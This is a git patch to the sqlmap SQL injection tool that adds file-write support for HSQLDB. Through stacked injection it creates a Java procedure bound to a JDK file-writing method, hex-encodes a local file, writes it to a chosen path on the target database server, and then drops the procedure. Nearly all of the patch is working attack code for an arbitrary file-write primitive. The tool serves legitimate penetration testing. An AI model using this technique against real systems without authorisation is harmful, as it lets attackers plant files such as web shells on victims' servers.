From babe52eb1087280f1ea9c982abbef374976dffba Mon Sep 17 00:00:00 2001 From: tree-chtsec <68040445+tree-chtsec@users.noreply.github.com> Date: Tue, 13 Oct 2020 16:56:39 +0800 Subject: [PATCH] HSQLDB write file support (#4379) * Make asterisk work with --csrf-token option * add --file-write support in HSQLDB Co-authored-by: tree --- plugins/dbms/hsqldb/filesystem.py | 51 ++++++++++++++++++++++++++++-- plugins/dbms/hsqldb/fingerprint.py | 10 ++++++ 2 files changed, 58 insertions(+), 3 deletions(-) diff --git a/plugins/dbms/hsqldb/filesystem.py b/plugins/dbms/hsqldb/filesystem.py index 162c8e0a5..1f72a0c6e 100644 --- a/plugins/dbms/hsqldb/filesystem.py +++ b/plugins/dbms/hsqldb/filesystem.py @@ -5,6 +5,12 @@ Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ +from lib.core.common import randomStr +from lib.core.data import kb +from lib.core.data import logger +from lib.core.decorators import stackedmethod +from lib.core.enums import PLACE +from lib.request import inject from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.filesystem import Filesystem as GenericFilesystem @@ -13,6 +19,45 @@ class Filesystem(GenericFilesystem): errMsg = "on HSQLDB it is not possible to read files" raise SqlmapUnsupportedFeatureException(errMsg) - def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): - errMsg = "on HSQLDB it is not possible to write files" - raise SqlmapUnsupportedFeatureException(errMsg) + @stackedmethod + def stackedWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False): + + funcName = randomStr() + MAX_BYTES = 2 ** 20 + + debugMsg = "creating a Java Language Procedure '%s'" % funcName + logger.debug(debugMsg) + + addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (funcName, MAX_BYTES) + addFuncQuery += "LANGUAGE JAVA DETERMINISTIC NO SQL " + addFuncQuery += "EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'" + inject.goStacked(addFuncQuery) + + logger.debug("encoding file to its hexadecimal string value") + + fcEncodedList = self.fileEncode(localFile, "hex", True) + fcEncodedStr = fcEncodedList[0][2:] + fcEncodedStrLen = len(fcEncodedStr) + + if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000: + warnMsg = "the injection is on a GET parameter and the file " + warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen + warnMsg += "bytes, this might cause errors in the file " + warnMsg += "writing process" + logger.warn(warnMsg) + + debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile) + logger.debug(debugMsg) + + # http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures + invokeQuery = "call %s('%s', cast ('%s' AS VARBINARY(%s)))" % (funcName, remoteFile, fcEncodedStr, MAX_BYTES) + inject.goStacked(invokeQuery) + + logger.debug("removing procedure %s from DB" % funcName) + delQuery = "DELETE PROCEDURE " + funcName + inject.goStacked(delQuery) + + message = "the local file '%s' has been successfully written on the back-end DBMS" % localFile + message += "file system ('%s')" % remoteFile + logger.info(message) + diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py index 6641acd21..3b0bfb033 100644 --- a/plugins/dbms/hsqldb/fingerprint.py +++ b/plugins/dbms/hsqldb/fingerprint.py @@ -144,3 +144,13 @@ class Fingerprint(GenericFingerprint): def getHostname(self): warnMsg = "on HSQLDB it is not possible to enumerate the hostname" logger.warn(warnMsg) + + + def checkDbmsOs(self, detailed=False): + if Backend.getOs(): + infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() + logger.info(infoMsg) + else: + self.userChooseDbmsOs() + +